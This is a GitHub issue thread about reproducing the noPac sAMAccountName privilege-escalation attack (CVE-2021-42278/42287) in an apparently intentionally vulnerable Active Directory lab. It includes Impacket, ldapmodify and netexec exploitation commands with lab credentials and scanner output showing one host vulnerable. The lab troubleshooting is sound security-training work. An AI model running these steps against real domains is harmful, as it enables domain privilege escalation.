Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Patch SamAccountName [CVE-2021-42287] #145

Closed
AlgunaPseudo opened this issue Nov 19, 2023 · 4 comments
Closed

Patch SamAccountName [CVE-2021-42287] #145

AlgunaPseudo opened this issue Nov 19, 2023 · 4 comments

Comments

@AlgunaPseudo
Copy link

Hi,

It would appear that the SamAccountName vulnerability is no longer exploitable on DC02. I've tried to exploit it with Impacket pull requests (fortra/impacket#1202 and fortra/impacket#1224) and also with ldapmodify and in both cases I get an error 00000523 (https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e -> make sure sAMAccountName ends with '$').

Via Impacket :

$ python3 renameMachine.py -current-name 'samaccountname$' -new-name 'winterfell' -dc-ip 'winterfell.north.sevenkingdoms.local' north.sevenkingdoms.local/jon.snow:iknownothing
[...]

[*] Modifying attribute (sAMAccountName) of object (CN=samaccountname,CN=Computers,DC=north,DC=sevenkingdoms,DC=local): (samaccountname$) -> (winterfell)
[*] New sAMAccountName does not end with '$' (attempting CVE-2021-42278)
[-] Server probably patched against CVE-2021-42278

Via Ldapsearch :

$ cat modify_samaccountname.ldif
dn: CN=samaccountname,CN=Computers,DC=north,DC=sevenkingdoms,DC=local
changetype: modify
replace: sAMAccountName
sAMAccountName: winterfell

$ ldapmodify -x -H ldap://192.168.10.11 -D "jon.snow@north.sevenkingdoms.local" -w iknownothing -f modify_samaccountname.ldif
modifying entry "CN=samaccountname,CN=Computers,DC=north,DC=sevenkingdoms,DC=local"
ldap_modify: Other (e.g., implementation specific) error (80)
	additional info: 00000523: SysErr: DSID-031A1242, problem 22 (Invalid argument), data 0

Why DC02? Because this is the example used in mayfly277's write-up.

@Mayfly277
Copy link
Collaborator

i just redo the attack path by copy/pasting the commands from my blog and it work well on a fresh install.
image
image

Could you try a TGT pac size test with netexec on your instance ?
image

i close as it seems to be an issue on your side.

@AlgunaPseudo
Copy link
Author

Hi Mayfly,

The command output shows me that the PAC cannot be affected by CVE 2021-42278 :

$ netexec smb winterfell.north.sevenkingdoms.local -u jon.snow -p iknownothing -d north.sevenkingdoms.local -M nopac
SMB         192.168.10.11   445    WINTERFELL       [*] Windows 10.0 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB         192.168.10.11   445    WINTERFELL       [+] north.sevenkingdoms.local\jon.snow:iknownothing 
NOPAC       192.168.10.11   445    WINTERFELL       TGT with PAC size 1743
NOPAC       192.168.10.11   445    WINTERFELL       TGT without PAC size 1743

I hadn't specified it, but my lab was setup on Proxmox (following your doc). Perhaps there's a difference with the lab set up locally via viagrant?

@Mayfly277
Copy link
Collaborator

Sad :/ , certainly the image you take (or the link i provide) for setting up the lab is more recent and patched. imo you can try on essos if it work.

@AlgunaPseudo
Copy link
Author

Indeed, it works on essos!

$ netexec smb meereen.essos.local -u khal.drogo -p horse -d essos.local -M nopac
SMB         192.168.10.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB         192.168.10.12   445    MEEREEN          [+] essos.local\khal.drogo:horse 
NOPAC       192.168.10.12   445    MEEREEN          TGT with PAC size 1465
NOPAC       192.168.10.12   445    MEEREEN          TGT without PAC size 708
NOPAC       192.168.10.12   445    MEEREEN          
NOPAC       192.168.10.12   445    MEEREEN          VULNERABLE
NOPAC       192.168.10.12   445    MEEREEN          Next step: https://github.com/Ridter/noPac

(thank you Microsoft for not patching Windows Server 2016)

Thanks for your feedback

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants